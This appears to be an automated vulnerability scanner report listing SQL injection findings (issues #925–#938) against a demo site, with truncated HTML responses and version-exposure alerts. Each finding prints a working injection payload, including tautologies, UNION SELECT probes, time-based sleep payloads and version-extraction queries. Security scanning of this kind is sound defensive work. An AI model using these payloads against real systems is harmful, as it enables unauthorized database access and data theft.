href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #925\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR x=x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #926\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ') or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #927\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin\"/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #928\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 1083=1083 AND (1427=1427\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #929\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR x=y\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #930\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #931\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin' or '1'='1'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #932\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 28--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #933\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND true\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #934\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io and (select substring(@@version,3,1))='c'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #935\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(\n116)+CHAR(69)+CHAR(65)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #936\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #937\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioHAVING 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #938\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives 